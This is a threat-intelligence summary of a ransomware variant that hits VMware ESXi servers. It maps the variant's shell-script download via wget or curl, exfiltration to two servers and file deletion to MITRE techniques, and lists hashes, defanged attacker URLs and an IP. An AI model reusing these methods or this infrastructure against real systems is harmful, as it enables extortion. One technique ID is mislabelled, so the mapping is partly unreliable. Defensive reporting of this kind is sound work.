Trend Micro details TargetCompany’s Linux variant that targets VMware ESXi environments with a new payload delivery and execution method using a custom shell script, plus dual-server data exfiltration. The Linux variant checks for ESXi, encrypts VM-related files, and indicates a broader campaign targeting expansive IT systems through an ESXi-focused strategy. #TargetCompany #WaterGatpanapun #Mallox #Vampire #ESXi
Keypoints
- The TargetCompany ransomware group has released a new Linux variant that uses a custom shell script for payload delivery and execution, a technique not seen in earlier variants.
- The shell script exfiltrates the victim’s information to two different servers to provide backups for the attackers.
- The Linux variant can detect if the victim’s machine is running in a VMware ESXi environment and operates with a VM-focused mode to encrypt files.
- By targeting ESXi servers, the attackers aim to disrupt operations and improve ransom payout chances.
- An affiliate named “vampire” is associated with this sample, suggesting broader campaigns targeting large IT infrastructures; infrastructure details include a new IP address and short-lived TLS certificate.
- The campaign demonstrates ongoing evolution of TargetCompany techniques, including redacted or obfuscated delivery methods and multi-channel exfiltration for resilience.
MITRE Techniques
- [T1070.004] File Deletion – Used to remove payload artifacts after execution. Quote: “After the ransomware performs its routine, the script deletes the TargetCompany payload using the command “rm -f x”.”
- [T1082] System Information Discovery – Used to detect ESXi by checking system information. Quote: “The binary performs a check by executing the command “uname” to determine whether the machine is running in a VMware ESXi environment.”
- [T1059.004] Command and Scripting Interpreter: Unix Shell – Execution via a custom shell script to download and run the payload. Quote: “Upon further investigations, we found out that a shell script was used to download and execute the ransomware payload hosted in a designated URL. Figure 9 shows the custom-made shell script by the threat actors specifically to execute this TargetCompany variant.”
- [T1105] Ingress Tool Transfer – The script downloads the ransomware payload from a download URL. Quote: “The script attempts to download the TargetCompany payload from the download URL using “wget” or “curl,” whichever works between the two commands.”
- [T1408] Exfiltration over Alternative Protocol – Exfiltration of victim data to two different servers. Quote: “This variant exfiltrates victim information to two different servers.”
- [T1041] Exfiltration over C2 Channel – Data exfiltration to a C2 server with a specified file name. Quote: “The contents of TargetInfo.txt will be sent to a command-and-control (C&C) server, hxxp://91[BLOCKED], with the file name ap.php.”
- [T1486] Data Encrypted for Impact – Encrypting ESXi VM-related files after entering VM mode. Quote: “Encrypting critical ESXi servers could also increase the likelihood of successful ransom payments.”
Indicators of Compromise
- [Hash] TargetCompany Linux Variant – dffa99b9fe6e7d3e19afba38c9f7ec739581f656, 2b82b463dab61cd3d7765492d7b4a529b4618e57
- [URL] Download URLs – hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh, hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x
- [IP] Delivery/Exfiltration IP – 111.10.231.151
- [File name] Exfil/Note files – TargetInfo.txt, ap.php